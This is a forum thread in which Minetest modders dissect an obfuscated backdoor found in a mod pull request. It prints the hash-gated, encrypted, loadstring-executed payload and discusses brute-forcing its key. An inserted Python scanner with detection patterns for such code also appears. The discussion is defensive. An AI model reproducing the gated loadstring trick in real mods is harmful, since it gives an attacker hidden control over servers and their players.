Suspicious block of code in a mod pull request

joe7575
Member
Posts: 851
Joined: Mon Apr 24, 2017 20:38
GitHub: joe7575
In-game: JoSto wuffi
Location: Germany, in the deep south

Suspicious block of code in a mod pull request

by joe7575 » Post

I found this code block in a PR in one of my mods:

    -- Trigger: the check only runs when the item in hand is a written book
    if stack:get_name() == "default:book_written" then
        -- The book's text serves as the secret key; the key itself is never stored in the mod
        local key = stack:get_meta():get_string("text")
        -- The key is verified against a fixed password hash, so the source does not reveal it
        local hash = minetest.get_password_hash("key", key)
        if hash == "ERV14RNotIbIPklZ5f2gQtAKDNc" then
            -- The payload: a base64 blob, split into chunks and concatenated with ".."
            local code = minetest.decode_base64("hWRHSF8RDYiS7Ag6gicCA0iTYc3" ..
                "fUV3sQZB2VZ4FLXefGb0uunYrbuTScPazwl/SDNwaj1a0MrFhlNywzkwviv" ..
                "mrbM3jc1aU3ENI9NOTC4zQQBBjb8VKaE0sKfZ555rG1fceGwvOGicisERE2" ..
                "ByiMo64edZSMEzoicd2/mTHb+/kfM9RNza88IVwxsiMjQValdrnkesxlbea" ..
                "AW3EznWX9Y9ESDNKDUQlcg")
            -- Convert to a byte array and apply a key-seeded PRNG as a keystream to unmask it
            code = {code:byte(1, #code)}
            local pr = PcgRandom(tonumber(key))
            for i = 1, #code do
                code[i] = (code[i] + pr:next(0, 255)) % 256
            end
            -- Inflate the unmasked bytes into Lua source and execute it, passing the player object
            code = minetest.decompress(string.char(unpack(code)), "deflate")
            loadstring(code)()(player)
        end
    end
Any ideas what that is for?
Sent from my Commodore 64. Some of my Mods: Tech Age, TechPack, Hyperloop, Tower Crane, Lumberjack, vm16, Minecart, Signs Bot.

Krock
Developer
Posts: 4650
Joined: Thu Oct 03, 2013 07:48
GitHub: SmallJoker
Location: Switzerland

Re: Suspicious block of code in a mod pull request

by Krock » Post

The "key" parameter makes it a password-protected binary blob. Who knows what's inside this compressed thing, but "loadstring" definitely sounds dangerous, even if it only takes the player as argument.
Look, I programmed a bug for you. >> Mod Search Engine << - Mods by Krock - DuckDuckGo mod search bang: !mtmod <keyword here>

joe7575
Member
Posts: 851
Joined: Mon Apr 24, 2017 20:38
GitHub: joe7575
In-game: JoSto wuffi
Location: Germany, in the deep south

Re: Suspicious block of code in a mod pull request

by joe7575 » Post

But this can be used, e.g. to give the player server privs...

rubenwardy
Moderator
Posts: 6978
Joined: Tue Jun 12, 2012 18:11
GitHub: rubenwardy
IRC: rubenwardy
In-game: rubenwardy
Location: Bristol, United Kingdom

Re: Suspicious block of code in a mod pull request

by rubenwardy » Post

This is dodgy asf, just reject the PR
Renewed Tab (my browser add-on) | Donate | Mods | Minetest Modding Book

Hello profile reader

Astrobe
Member
Posts: 577
Joined: Sun Apr 01, 2018 10:46

Re: Suspicious block of code in a mod pull request

by Astrobe » Post

Yes, basically if a player writes a specific text in a book, it triggers the decryption of what's encoded in the "code" string, and the book's text is also the key to decrypt it.

Basically only the author knows how to pull the trigger and what it does. The PcgRandom thing looks like a pseudo one-time-pad encryption scheme. It tells us however that the book's text must be convertible to a number.

So if you are curious, you can try to feed numbers to get_password_hash() until you get the hash that the block looks for. Depending on how many hashes your hardware can compute per second, and perhaps with some heuristics (dictionaries, birthdates, ...) to restrict the search space, this could be cracked.

Or if you can pretend this landed on a server but actually put a different version, you can log the result (or just the key; the code could be some kind of "zip bomb" too) instead of loadstring'ing it.

joe7575
Member
Posts: 851
Joined: Mon Apr 24, 2017 20:38
GitHub: joe7575
In-game: JoSto wuffi
Location: Germany, in the deep south

Re: Suspicious block of code in a mod pull request

by joe7575 » Post

How can you warn other modders of such attacks, or which mods could also be affected?

Astrobe
Member
Posts: 577
Joined: Sun Apr 01, 2018 10:46

Re: Suspicious block of code in a mod pull request

by Astrobe » Post

Probably look for loadstring() and similar functions. As Lua is used in a lot of games (among other less serious uses, no jk because real-time multiplayer 3D games are more demanding than many applications), tools probably already exist for generic Lua "backdoors". Perhaps the Minetest API introduces other opportunities, though.
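A pre-merge check of the kind Astrobe suggests, as an added example that is not from the thread or from any of the mods named: it scans Lua source for the combination seen in the first post (dynamic code loading next to an encoded or compressed payload and a hash-gated trigger) over a constructed sample. The sample Lua, the rule categories and the verdict names are my own; the Minetest function names are the ones used in the posted block.

```python
import re

# Constructed Lua sample (not the PR's code): same shape as the block in the
# first post, with placeholder hash and payload literals.
SAMPLE_LUA = """\
minetest.register_on_joinplayer(function(player)
    local stack = player:get_inventory():get_stack("main", 1)
    if stack:get_name() == "default:book_written" then
        local key = stack:get_meta():get_string("text")
        local hash = minetest.get_password_hash("key", key)
        if hash == "NOTAREALHASH" then
            local code = minetest.decode_base64("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
            code = minetest.decompress(code, "deflate")
            loadstring(code)()(player)
        end
    end
    minetest.log("action", "player joined")
end)
"""

# Each rule is (category, regex); none is damning alone, the combination is.
RULES = [
    ("dynamic code execution", r"\b(loadstring|load|loadfile|dofile)\s*\("),
    ("base64 decode", r"\bminetest\.decode_base64\s*\("),
    ("decompression", r"\bminetest\.decompress\s*\("),
    ("hash-gated trigger", r"\bminetest\.get_password_hash\s*\("),
    # The thread's payload was split into ~27-char chunks joined with "..", so keep this low.
    ("long opaque string literal", r'"[A-Za-z0-9+/=]{24,}"'),
]
OBFUSCATION = {"base64 decode", "decompression", "long opaque string literal"}

def scan_lua_source(source):
    """Return [(line_number, category), ...] for every rule hit, in file order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for category, pattern in RULES:
            if re.search(pattern, line):
                findings.append((lineno, category))
    return findings

def classify(findings):
    """'block' when code execution is combined with an obfuscated payload,
    'review' for any other hit (a lone loadstring may be legitimate), 'clean' otherwise."""
    categories = {category for _, category in findings}
    if "dynamic code execution" in categories and categories & OBFUSCATION:
        return "block"
    return "review" if categories else "clean"

print(classify(scan_lua_source(SAMPLE_LUA)))  # → block
```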

DELTA_FORCE
Member
Posts: 165
Joined: Tue Oct 30, 2018 01:26
IRC: DELTA_FORCE
In-game: DELTA_FORCE
Location: ee

Re: Suspicious block of code in a mod pull request

by DELTA_FORCE » Post

Here's a trick you should use in any PR: if the code isn't readable, reject it. If it is questionable, reject it. Doesn't matter if it works. There is no reason anyone would write something this obfuscated for any function in a Minetest mod.
check me out nowhere because i never do anything

ShadMOrdre
Member
Posts: 1118
Joined: Mon Dec 29, 2014 08:07
Location: USA

Re: Suspicious block of code in a mod pull request

by ShadMOrdre » Post

It's most likely possible to have this value simply dumped to a text string. As long as the resultant code isn't run through loadstring, there shouldn't be an issue.

I suppose I'd be willing to do so, and report the results here.

Shad

Mantar
Member
Posts: 590
Joined: Thu Oct 05, 2017 18:46

Re: Suspicious block of code in a mod pull request

by Mantar » Post

Shad: true, but you first have to brute-force the key. My guess is Joe7575 is right, this is a backdoor that lets the author give himself admin privs on the server. It could be any arbitrary Lua function hidden in that "code" variable, but I can't imagine what else you'd want to do to your player character where you'd want a personal backdoor.
If you got banned you could come back under any alias, write the key in a book, and get admin privs immediately.

I'd reject anything obfuscated like this out of hand, and tell the submitter to explain himself or take a hike, because if he doesn't come clean, nothing he submits is ever going in after this.
Lead dev of Exile, git repo: https://codeberg.org/Mantar/Exile

Lone_Wolf
Member
Posts: 2578
Joined: Sun Apr 09, 2017 05:50
GitHub: LoneWolfHT
IRC: LandarVargan
In-game: LandarVargan

Re: Suspicious block of code in a mod pull request

by Lone_Wolf » Post

The key was found, see the GH thread
My ContentDB -|- Working on CaptureTheFlag -|- Minetest Forums Dark Theme!! (You need it)

ShadMOrdre
Member
Posts: 1118
Joined: Mon Dec 29, 2014 08:07
Location: USA

Re: Suspicious block of code in a mod pull request

by ShadMOrdre » Post

Yes. I realize that I am still learning a few things. :)

Of course, obfuscated code should always be rejected.

I do wonder if someone has found a vulnerability within the engine code, possibly within the SQL database code.

Understanding what the engine exposes to the Lua API (privileges, hash functions) and how they work together, someone can reverse engineer the engine logic of these functions and then implement a Lua workaround.

There should be better safeguards against any part of the Lua API being able to circumvent any part of the engine.

Shad

rubenwardy
Moderator
Posts: 6978
Joined: Tue Jun 12, 2012 18:11
GitHub: rubenwardy
IRC: rubenwardy
In-game: rubenwardy
Location: Bristol, United Kingdom

Re: Suspicious block of code in a mod pull request

by rubenwardy » Post


Astrobe
Member
Posts: 577
Joined: Sun Apr 01, 2018 10:46

Re: Suspicious block of code in a mod pull request

by Astrobe » Post

All this to get 99 mese and loaded dice? It's almost cute.

runs
Member
Posts: 3225
Joined: Sat Oct 27, 2018 08:32

Re: Suspicious block of code in a mod pull request

by runs » Post

The first Minetest VIRUS!!!!

I get my popcorn and sit down.

Astrobe
Member
Posts: 577
Joined: Sun Apr 01, 2018 10:46

Re: Suspicious block of code in a mod pull request

by Astrobe » Post

FWIW, I confirm that the key given by Savilli on GitHub actually gives the hash written in the code.

Eris
Member
Posts: 178
Joined: Thu Nov 19, 2020 23:12
IRC: definitelya Ovalo
In-game: Eris_still_crafts

Re: Suspicious block of code in a mod pull request

by Eris » Post

Ah yes, let's risk my whole Minetest reputation by posting malware... to cheat on a server.
Jump in the caac

L-Dog
Member
Posts: 481
Joined: Sat Jun 19, 2021 12:49
GitHub: N-nec
In-game: L-Dog

Re: Suspicious block of code in a mod pull request

by L-Dog » Post

Eris wrote:
Tue Jan 04, 2022 07:47
Ah yes, let's risk my whole Minetest reputation by posting malware... to cheat on a server.
Is there a table of all the prizes from it?

In any case, it's not worth adding. Easter egg thing? It's not even Easter, and even if it was, I doubt players will wanna smash numbers into a book.

It's hard enough getting players to understand the HP_Upgrade_Packs.

Blockhead
Member
Posts: 1685
Joined: Wed Jul 17, 2019 10:14
GitHub: Montandalar
IRC: Blockhead256
In-game: Blockhead Blockhead256
Location: Land Down Under

Re: Suspicious block of code in a mod pull request

by Blockhead » Post

Also, why bother modifying the random number generator when the seed is provided to every client on a server and it's well-known that you can X-ray in the engine?
/˳˳_˳˳]_[˳˳_˳˳]_[˳˳_˳˳\ Advtrains enthusiast | My map: Noah's Railyard | My Content on ContentDB ✝️♂

Linuxdirk
Member
Posts: 3219
Joined: Wed Sep 17, 2014 11:21
In-game: Linuxdirk
Location: Germany

Re: Suspicious block of code in a mod pull request

by Linuxdirk » Post

rubenwardy wrote:
Mon Jan 03, 2022 18:41
This is dodgy asf, just reject the PR
Also: Ban the user from your repository.

joe7575
Member
Posts: 851
Joined: Mon Apr 24, 2017 20:38
GitHub: joe7575
In-game: JoSto wuffi
Location: Germany, in the deep south

Re: Suspicious block of code in a mod pull request

by joe7575 » Post

Blockhead wrote:
Wed Jan 05, 2022 03:52
Also, why bother modifying the random number generator when the seed is provided to every client on a server and it's well-known that you can X-ray in the engine?
`math.random` is used for many reasons in techage and other mods and thus indirectly also used by many players on a server. This means that a prediction of the next number is hardly possible.
But if your own `math.random` is used, which is restarted over and over again via an in-game mechanism, the same series of numbers appears over and over again. This can then be more easily exploited.

But that doesn't really make sense and the 99 mese are peanuts. I don't understand the reason behind it.

rubenwardy
Moderator
Posts: 6978
Joined: Tue Jun 12, 2012 18:11
GitHub: rubenwardy
IRC: rubenwardy
In-game: rubenwardy
Location: Bristol, United Kingdom

Re: Suspicious block of code in a mod pull request

by rubenwardy » Post

Linuxdirk wrote:
Wed Jan 05, 2022 07:59
Also: Ban the user from your repository.
I'd definitely recommend doing this, you can't trust them

joe7575
Member
Posts: 851
Joined: Mon Apr 24, 2017 20:38
GitHub: joe7575
In-game: JoSto wuffi
Location: Germany, in the deep south

Re: Suspicious block of code in a mod pull request

by joe7575 » Post

I did, thanks

Astrobe
Member
Posts: 577
Joined: Sun Apr 01, 2018 10:46

Re: Suspicious block of code in a mod pull request

by Astrobe » Post

joe7575 wrote:
Wed Jan 05, 2022 09:57
But that doesn't really make sense and the 99 mese are peanuts. I don't understand the reason behind it
Maybe it serves as a clue that the key was accepted. The guy was probably hoping that his hack would spread among the servers using your mods, but as they have no access to which version of your mod is on a server, they had to have a hint that it is "their" version.

jordan4ibanez
Member
Posts: 1923
Joined: Tue Sep 27, 2011 18:44
GitHub: jordan4ibanez
IRC: jordan4ibanez
In-game: jordan4ibanez

Re: Suspicious block of code in a mod pull request

by jordan4ibanez » Post

Oh a payload, didn't expect to ever see that in the game
hello, am program. do language in rust. make computer do. okay i go now.
